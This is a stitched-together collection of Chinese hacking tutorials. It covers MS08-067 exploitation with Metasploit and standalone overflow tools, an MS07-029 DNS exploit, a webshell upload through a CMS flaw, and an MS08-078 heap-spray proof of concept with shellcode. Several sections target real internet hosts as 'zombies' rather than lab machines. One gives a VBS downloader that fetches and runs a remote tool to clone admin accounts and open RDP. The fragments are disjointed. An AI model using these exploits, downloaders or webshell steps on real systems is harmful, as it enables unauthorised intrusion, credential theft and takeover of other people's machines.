黑客MS08-067漏洞攻击全程演示(图解)

MS08_067smb漏洞利⽤渗透测试
⽬标服务器：Windows XP 英⽂版
渗透测试机：KaLi
前⾔：
MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统，包括：Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本，甚⾄还包括测试阶段的Windows 7Pro-Beta.
本次实验⽬标服务器系统
1、查看⽬标和本地IP，如果实战的话，我们需要扫描噢，这⾥我们就直接利⽤了。

2、启动MSFConsole，搜索并使⽤MS06_067模块
3、配置相应参数，并运⾏，配置⽬标靶机地址，然后exploit或者run
4、使⽤hashdump获取xp的⽤户hash值，然后在使⽤kali⾃带⼯具ophcrack进⾏密码破解
使⽤ophcrack⼯具进⾏破解，破解出密码为123456
5、在刚才的meterpreter中开启⽬标的远程桌⾯服务
6、对⽬标进⾏远程桌⾯连接
7、渗透测试结束
读书和健⾝总有⼀个在路上。

一个比较完整的metasploit基础资料。

本文包括使用Metasploit端口扫描，操作系统探测，漏洞检测，漏洞利用，开启后门的介绍参考资料：BackTrack 4 Assuring Security by Penetration Testing关于Metasploit的介绍我就不多说了，用百度搜索一下有很多示范的漏洞是MS08-067,是一个比较老的漏洞了，系统也很老——Windows 2000 AdvancedSever。

本文主要目的是为了介绍Metasploit的使用，MS08-067是一个比较容易成功的实例，所以就选择这个了。

###################实验环境介绍####################被攻击主机：OS:Windows 2000 AdvancedServerIP:192.168.200.140攻击者主机：OS:BT5 R1IP:192.168.200.148##################入侵前的准备工作：端口扫描、漏洞检测##################因需要用到db_nmap命令，查看当前的数据库连接状态msf > db_statuspostgresql connected to msf3可以，看到当前已经连接到数据库postgresqlmsf > db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.200.140Nmap: Starting Nmap 5.51SVN ( ) at 2011-12-27 01:06 ESTNmap: Nmap scan report for 192.168.200.140Nmap: Host is up (0.0023s latency).Nmap: Not shown: 970 closed portsNmap: PORT STA TE SERVICE VERSIONNmap: 25/tcp open smtp Microsoft ESMTP 5.0.2195.6713Nmap: 42/tcp open wins Microsoft Windows WinsNmap: 53/tcp open domain Microsoft DNSNmap: 80/tcp open http Microsoft IIS httpd 5.0Nmap: 88/tcp open kerberos-sec Microsoft Windows kerberos-secNmap: 119/tcp open nntp Microsoft NNTP Service 5.0.2195.6702 (posting ok) Nmap: 135/tcp open msrpc Microsoft Windows RPCNmap: 139/tcp open netbios-ssnNmap: 389/tcp open ldapNmap: 443/tcp open https?Nmap: 445/tcp open microsoft-ds Microsoft Windows 2000 microsoft-dsNmap: 464/tcp open kpasswd5?Nmap: 563/tcp open snews?Nmap: 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0Nmap: 636/tcp open tcpwrappedNmap: 1026/tcp open msrpc Microsoft Windows RPCNmap: 1029/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0Nmap: 1036/tcp open mstask Microsoft mstask (task server -c:winntsystem32Mstask.exe)Nmap: 1042/tcp open msrpc Microsoft Windows RPCNmap: 1044/tcp open mstask Microsoft mstask (task server - c:winntsystem32Mstask.exe)Nmap: 1045/tcp open msrpc Microsoft Windows RPCNmap: 1051/tcp open msrpc Microsoft Windows RPCNmap: 1054/tcp open msrpc Microsoft Windows RPCNmap: 1061/tcp open mstask Microsoft mstask (task server - c:winntsystem32Mstask.exe)Nmap: 1062/tcp open mstask Microsoft mstask (task server - c:winntsystem32Mstask.exe)Nmap: 1122/tcp open msrpc Microsoft Windows RPCNmap: 3268/tcp open ldapNmap: 3269/tcp open tcpwrappedNmap: 3372/tcp open msdtc Microsoft Distributed Transaction Coordinator (error) Nmap: 3389/tcp open microsoft-rdp Microsoft Terminal ServiceNmap: MAC Address: 00:0C:29:EA:2C:5D (VMware)Nmap: Device type: general purposeNmap: Running: Microsoft Windows 2000|XP|MeNmap: OS details: Microsoft Windows 2000 SP0/SP2/SP4 or Windows XP SP0/SP1, Microsoft Windows 2000 SP1, Microsoft Windows 2000 SP2, Microsoft Windows Millennium Edition (Me) Nmap: Network Distance: 1 hopNmap: Service Info: Host: ; OS: WindowsNmap: Host script results:Nmap: | smb-check-vulns:Nmap: | MS08-067: VULNERABLENmap: | Conficker: Likely CLEANNmap: | regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)Nmap: | SMBv2 DoS (CVE-2009-3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)Nmap: | MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)Nmap: |_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)Nmap: OS and Service detection performed. Please report any incorrect results at /submit/ .Nmap: Nmap done: 1 IP address (1 host up) scanned in 52.73 seconds使用db_nmap命令，可以看到192.168.200.140的操作系统和可能存在的漏洞，其中包括此次实验的MS08-067.#########################开始入侵###########################查询并查看有关MS08_067的漏洞信息msf > search ms08_067Matching Modules================Name Disclosure Date Rank Description—- ——————- ———–exploit/windows/smb/ms08_067_netapi 2008-10-28 great Microsoft Server Service Relative Path Stack Corruptionmsf > use exploit/windows/smb/ms08_067_netapimsf exploit(ms08_067_netapi) > infoName: Microsoft Server Service Relative Path Stack CorruptionModule: exploit/windows/smb/ms08_067_netapiVersion: 12540Platform: WindowsPrivileged: YesLicense: Metasploit Framework License (BSD)Rank: GreatProvided by:hdm/cgi-bin/cvename.cgi?name=2008-4250/49243/technet/security/bulletin/MS08-067.mspxNEXPOSE (dcerpc-ms-netapi-netpathcanonicalize-dos)msf exploit(ms08_067_netapi) >查看攻击目标主机的需要配置的选项msf exploit(ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):Name Current Setting Required Description—- ———————–———–RHOST 192.168.200.140 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)Payload options (windows/shell_bind_tcp):Name Current Setting Required Description—- ———————–———–EXITFUNC thread yes Exit technique: seh, thread, process, noneLPORT 4444 yes The listen portRHOST 192.168.200.140 no The target addressExploit target:Id Name——-0 Automatic Targeting################使用Bind Shell方式#######################设置相关参数msf exploit(ms08_067_netapi) > set RHOST 192.168.200.140RHOST => 192.168.200.140设置payloadmsf exploit(ms08_067_netapi) > set payload windows/shell_bind_tcppayload => windows/shell_bind_tcp查看你设置参数的情况msf exploit(ms08_067_netapi) > show optionsModule options (exploit/windows/smb/ms08_067_netapi):Name Current Setting Required Description—- ———————–———–RHOST 192.168.200.140 yes The target addressRPORT 445 yes Set the SMB service portSMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)Payload options (windows/shell_bind_tcp):Name Current Setting Required Description—- ———————–———–EXITFUNC thread yes Exit technique: seh, thread, process, noneLPORT 4444 yes The listen portRHOST 192.168.200.140 no The target addressExploit target:Id Name——-0 Automatic Targeting现在开始溢出攻击msf exploit(ms08_067_netapi) > exploit•Started bind handler•Automatically detecting the target…•Fingerprint: Windows 2000 – Service Pack 0 – 4 – lang:English•Selected Target: Windows 2000 Universal•Attempting to trigger the vulnerability…•Command shell session 2 opened (192.168.200.148:34431 -> 192.168.200.140:4444) at 2011-12-27 01:14:59 -0500Microsoft Windows 2000 [V ersion 5.00.2195](C) Copyright 1985-2000 Microsoft Corp.C:WINNTsystem32>成功获得shell！哈哈！！！###########################使用Reverse Shell方式#####################大家知道如果攻击者与被攻击之间有防火墙的话，防火墙会检测TCP连接状态，正向连接可能不会成功。

利用MS08067远程溢出漏洞抓肉鸡说明：（1）由于扫描出来的结果比较少，所以直接看就可以了。

如果结果比较多，可以到sfind扫描目录下直接打开sfind.txt 扫描结果。

注意：（1）在溢出过程还有多种提示例如“Make SMB Connection error:64”（2）出现“Maybe Patched！”提示的计算机也可能溢出成功。

（3）仅仅对台湾和简体中文版本有效，对其他版本的服务器及时存在445漏洞也无法溢出，原因是操作系统溢出点内存地址不同。

3.监听“4444”端口在执行扫描的计算机上使用nc监听4444端口，具体命令为“nc –vv ip地址4444”，例如“nc –vv 218.69.*.2 4444”，一次不成功的溢出显示结果为“nc -vv 218.22.27.71 4444Warning: forward host lookup failed for : h_errno 11002:TRY_ [218.22.27.71] 4444 (?): TIMEDOUT sent 0, rcvd 0: NOTSOCK”，这说明218.22.27.71可能已经安装补丁、防火墙禁止对外进行连接等情况，导致溢出不成功。

说明：在MS08067中可以定制监听端口，不过那个端口需要在源程序中定制。

4.继续进行溢出将以上脚本在反弹的shell中直接粘贴即可从Ftp服务器上下载，然后可以在反弹的Shell中执行下载的文件。

在本次渗透过程中，由于是相邻IP，因此使用了一个简便的方法，即单击“开始”-“运行”，在其中输入“\\IP\admin$”或者“\\IP\C$”并确定，如图6所示，如图能够连接，则会出现一个输入网络密码的提示框，在用户和密码中分别输入刚才添加的用户名。

8．获取系统详细信息以及执行各种命令使用MS08067溢出工具成功溢出服务器后，还可以使用“telnet IP地址4444”连接被溢出服务器，如图8所示，偶使用telnet进行了尝试，获取系统信息并开放了3389端口。

前言：MS07-029，Windows 域名系统(DNS) 服务器服务的远程过程调用(RPC) 管理接口中存在基于堆栈的缓冲区溢出。

漏洞的前提是没打补丁，开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。

今天，就让我带领各路英豪，踏上DNS EXP之路。

我们先来看看所用工具的界面：这就是传说中的利用工具，可以通杀2000SEVER，2003SEVER系统，另外还具备了扫描功能!先用它来对主机进行扫描：在我们的命令行下输入：“dns –s 目标IP地址”稍等片刻，开放的端口以及操作系统以出现在我们面前，如果出现了如上图所显示的“1029:Vulnerability”那么恭喜你，你马上就会成功得到这台主机的权限了上图意思就是1029端口存在漏洞。

现在我们来最关键的步骤――溢出：在命令行内输入dns -2003chs *.*.93.189 1029其中-2003ch的意思是操作系统的型号，-2003chs即简体中文版的2003系统，如果是2000的系统就使用“-2000all”参数，*.*.93.189就是我们的目标IP地址，10 29就是刚才扫描出存在漏洞的端口”。

出现“Attack sent ,check port 1100”字样，说明已经打开了目标地址的1100端口，我们TELNET上去：TELNET *.*.93.189 1100我们现在已经成功的入侵了对方的电脑，并且得到了管理员的权限。

下面我给大家介绍一下如何在肉鸡上面开3389，在命令行里输入@echo with wscript:if .arguments.count^ tony.vbs@echo set aso=.createobject("adodb.stream"):set web=createobject("microsoft.xmlhttp") >> tony.vbs@echo web.open "get",.arguments(0),0:web.send:if web.status^>200 then .echo "Error:"+web.status:.quit >> tony.vbs@echo aso.type=1:aso.open:aso.write web.responsebody:aso.savetofile .arguments(1),2:end with >> tony.vbs大概的意思就是在命令行创立一个用来下载的VBS脚本tony.vbs然后把开3389的工具上传到你的个人空间,我这里用的是火狐开3389的工具，在命令行里输入cscript tony.vbs http://你空间地址/wrsky.exe c:wrsky.exe“wrsky.exe -c”可以克隆当前管理员帐号再输入“c:wrsky.exe -o 3551”意思就是打开对方的远程桌面服务，并且使用3551端口。

前言目前国内书店关于脚本方面的书籍特别多，但这些书相对来讲理论性的知识偏多。

更重要的这些书中介绍的例子，在安全性上都是漏洞百出，这样导致新学脚本的朋友写出来的程序同样是漏洞百出，典型的恶性循环。

而当前主要讲述脚本程序漏洞的方面书籍却没有，所以《黑客手册》决定联合我出版《精通脚本黑客》一书。

《精通脚本黑客》是一本集合了脚本环境和黑客知识的网络安全基础教程，一个大的脚本环境下，介绍了网站入侵、各种常见脚本语言的基础学习、脚本程序漏洞分析与利用等内容。

网站入侵方面是为没有多少入侵经验或对脚本环境下的入侵技术没有了解的朋友而准备；而各种常见脚本语言的基础学习是为没有脚本语言基础但已有一定入侵经验的朋友而准备；等有了前面的基础后就介绍如何在脚本程序中寻找各种漏洞并加以利用。

本书的目的是用通俗的语言来讲述脚本环境下的各种安全问题，期间没有复杂的理论。

以下是本书的主题内容以及结构层次：1、熟悉ASP、PHP、JSP网站的搭建。

告诉你网站是如何被架构的，进而为后面分析脚本程序漏洞时，测试漏洞所用。

2、常见的各种脚本攻击技术。

全面、细致的介绍脚本环境下的各种黑客技术，如coookie 欺骗、注入、跨站、文件包含、获取webshell及提权等等。

让你可以轻松的入侵并控制一个网站服务器。

3、让你轻松入门学习HTML、Javascript、VBscript等客户端脚本语言，从而在本质上认识挂马、跨站等黑客技术，同时还有一些常见的脚本病毒的编写。

4、数据库学习。

先介绍SQL语言的基础学习，为后面分析程序漏洞打下坚实的基础。

同时介绍SQL Server、MySQL等数据库下的高级黑客技术。

5、ASP下的黑客技术。

先给大家讲解ASP基础，让大家能够看懂ASP程序。

之后，就介绍ASP程序中常见的漏洞，教大家如何分析ASP程序中的漏洞，如注入、跨站等等，同时还介绍一些ASP木马编写技术。

最后，还用两个分析完整程序漏洞的例子作为实践，增加一些实战经验。

黑客MS08-067漏洞攻击全程演示（图解）MS08-067漏洞是Server 服务中的漏洞，该漏洞可能允许远程代码执行。

下面我们来进行MS08-067漏洞远程溢出演示，让我们看看我们的机子是如何轻易的成为人家的肉鸡，被控制的1.漏洞主机扫描。

使用专业端口扫描工具扫描445端口。

获取可溢出的主机列表。

如下图：2.MS08-067溢出工具进行主机溢出，格式ms08-067.exe ip 溢出成功标志：SMB Connect OK!Send Payload Over!3.溢出成功后会开放4444端口，直接telnet登陆上去。

4.Ipconfig确认溢出成功。

5.添加用户确认获取系统权限6.防范办法：针对该溢出，我们并不是没有办法，既然是要扫描445端口，然后telnet，我们只需如下的方法就可以解决：一、及时安装KB958644补丁二、关闭或屏蔽掉445端口。

三、安装专业防火墙。

《MS08-067》溢出：扫445端口, 溢出Q:提示SMB Connect OK!RpcExceptionCode() = 1722这样溢出成功了么？A:溢出失败，对方开启了防火墙。

Q:提示Make SMB Connection error:1203是怎么回事？A:对方没有开机联网或者没有安装Microsoft 网络的文件和打印机共享协议或没有启动Server服务。

Q:提示SMB Connect OK!Maybe Patched!补丁已经打上了。

不存在漏洞。

SMB Connect OKMaybe Patched!这个说明对方已经打了补丁SMB Connect OK!Send Payload Over!溢出成功----------------------------------------------------在cmd下直接运行MS08-067.exe 出现命令帮助MS08-067.exe <Server>很简单，只需要输入MS08-067.exe IP 就可以了。

最新科讯科技0day入侵演示网站平安电脑资料
如今程序在不断的开展，更新，
我们今天就拿第一个来演示，目的地址为(.**.**.) 图1
因为破绽出在头像上传的地方，所以第一步，我们的先一个用户。

再在用户上传头像那里上传我们的ASP木马。

已经写好了一个现成的科讯科技的破绽利用工具。

工具使用很简单。

傻瓜化。

图2
工具上有6个点击连接。

1.用户。

2.头像上传。

3修改目录拿WebShell.4.查看WebShell地址。

5.程序的默认数据库下载。

6读取程序的CONN文件把网站复制进去点击-翻开-用户。

图3
好了以后点击-头像上传，
上传好后点击-修改目录拿WebShell。

会
在.qf.lg./Upfiles/User/xiaozi目录下生成一个为X.ASP的文件，而在X.ASP这个文件下就是你的图片大马。

图5
直接点击-查看WebShell地址，在X.ASP的目录下就可以查看到我们的GIF木马的地址。

图6
点击-阅读就就能查看到我们图片木马的绝对途径。

图7
然后用我们的一句话木马连接。

图8
传我们免杀的ASP木马后成功得到WebShell. 图9
不知道大家看完后想起来什么没有?
其实这个破绽跟xx动易的破绽差不了多少。

破绽演示到此为止。

提权留给大家自己去领悟。

实操MS08-067漏洞攻击MS08-067漏洞将会影响除Windows Server 2008 Core以外的所有Windows系统，包括：Windows 2000/XP/Server 2003/Vista/Server 2008的各个版本，甚⾄还包括测试阶段的Windows 7 Pro-Beta。

中⽂名ms08-067外⽂名ms08-067发布⽇期：2008/10/22下载⼤⼩：因操作系统⽽异类别：漏洞说明：微软安全公告KB958644漏洞影响：服务器服务中的漏洞可能允许远程执⾏代码发布⽇期：2008/10/22下载⼤⼩：因操作系统⽽异。

受影响的操作系统： Windows 2000;XP;Server 2003;Vista;Server 2008;7 Beta摘要此安全更新解决了服务器服务中⼀个秘密报告的漏洞。

如果⽤户在受影响的系统上收到特制的 RPC 请求，则该漏洞可能允许远程执⾏代码。

在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003系统上，攻击者可能未经⾝份验证即可利⽤此漏洞运⾏任严重等级：Windows 2000;XP;Server 2003为严重，Windows Vista;Server 2008;7 Beta为重要。

0X02实战靶机ip 192.168.1.134 windows攻击机 192.168.1.137 kali先尝试⼀下能不能ping通能ping通MS08_067远程漏洞攻击实践：Shell1、在kali终端中开启msfconsole。

2然后找这个漏洞的利⽤⽅法msf5 > search ms08_067Matching Modules================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/windows/smb/ms08_067_netapi 2008-10-28 great Yes MS08-067 Microsoft Server Service Relative Path Stack Corruption3、输⼊命令use exploit/windows/smb/ms08_067_netapi，进⼊该漏洞模块的使⽤。

Defense：MS08067漏洞攻防渗透实验实验环境Windows XP SP3IP：172.16.211.129Kali Linux 2.0IP：172.16.211.128实验原理漏洞名称:Windows Server服务RPC请求缓冲区溢出漏洞（MS08-067）此安全更新解决了服务器服务中⼀个秘密报告的漏洞。

如果⽤户在受影响的系统上收到特制的 RPC 请求，则该漏洞可能允许远程执⾏代码。

在 Microsoft Windows 2000、Windows XP 和 Windows Server 2003 系统上，攻击者可能未经⾝份验证即可利⽤此漏洞运⾏任意代码。

此漏洞可能⽤于进⾏蠕⾍攻击。

防⽕墙最佳做法和标准的默认防⽕墙配置有助于保护⽹络资源免受从企业外部发起的攻击。

Kali 启动metasploit服务2.0 本⾝已内置，kali 2.0 已经没有metasploit 这个服务了，所以service metasploit start的⽅式不起作⽤。

kali 2.0中启动带数据库⽀持的⽅式#⾸先启动postgresql数据库/etc/init.d/postgresql start;或者service postgresql start;#初始化MSF数据库(关键步骤!)msfdb init;#运⾏msfconsolemsfconsole;#在msf中查看数据库连接状态db_status#将postgresql数据库设置开机⾃启update-rc.d postgresql enable漏洞利⽤过程在msfconsole使⽤search 命令搜索MS08067漏洞攻击程序从结果中得到 exploit/windows/smb/ms08_067_netapi表⽰当前msf框架中包含MS08067漏洞的攻击插件。

使⽤use命令调⽤MS08067漏洞攻击程序#进⼊msf的交互式命令窗⼝use exploit/windows/smb/ms08_067_netapi查看需要设置的选项#查看设置选项show options从图中可以看到还需设置RHOST（⽬标地址）、Exploit target（攻击⽬标）使⽤ set 命令设置 Module Options#设置⽬标IP即set rhost 172.16.211.129使⽤show options 命令查看设置情况从中可以看出⽬标IP已经设置好了，接着设置Exploit target，使⽤show targets 查看可选项可以看出以下版本的系统均存在此漏洞。

前置知识：XML关键词：漏洞、ShellCode 、XML 、MS08-078 菜鸟版Exploit 编写指南之四十八：MS08-078启示录——IE7 XML 远程代码执行漏洞分析与利用文/图 seer[N.N.U] & SAI[N.N.U]微软2008年末巨献，MS08-078 XML 远程代码执行漏洞在12月震撼登场。

朋友们，enjoy hacking ！ 这是一个Windows 解析HTML 文件的组件：mshtml.dll 所直接触发的漏洞，理论上通杀一切IE6.0～IE8.0内核的浏览器。

当攻击者构造特殊格式的XML 时，mshtml.dll 会错误的将其中的SRC 字串的部分内容当作函数指针处理，从而使攻击者获得对IE 进程的控制权，并结合Heap Spray 技术，执行任意代码。

简而言之，首先我们需要用Heap Spray 技术在内存中放好ShellCode ，然后通过构造畸形XML ，让浏览器去执行在它们。

我们先说简单的部分。

在基于浏览器的漏洞中，无论是常见的ActiveX 溢出，还是这类不太常见的漏洞，Heap Spray 总是必不可少的得力帮凶。

用某位大牛的话说，如同马克思列宁主义一样，放之四海而皆准。

milw0rm 公布的PoC 中的前半部分的代码如下（完整PoC 代码见附件）： <script>// k`sOSe 12/10/2008 - tested on winxp sp3, explorer 7.0.5730.13 // windows/exec - 141 bytes // // EXITFUNC=seh, CMD=C:\WINDOWS\system32\calc.exevar shellcode = unescape("%ue8fc%u0044%u0000%u458b…%u4100"); //一段开启本地calc.exe 的ShellCode var block = unescape("%u0a0a%u0a0a");var nops = unescape("%u9090%u9090%u9090"); while (block.length < 81920) block += block; var memory = new Array(); var i=0;for (;i<1000;i++) memory[i] += (block + nops + shellcode); </script> 以上这段代码就属于典型的通用办法，使用JavaScript 动态申请大量的堆块，在客户端浏览器内存中完成ShellCode 的部署。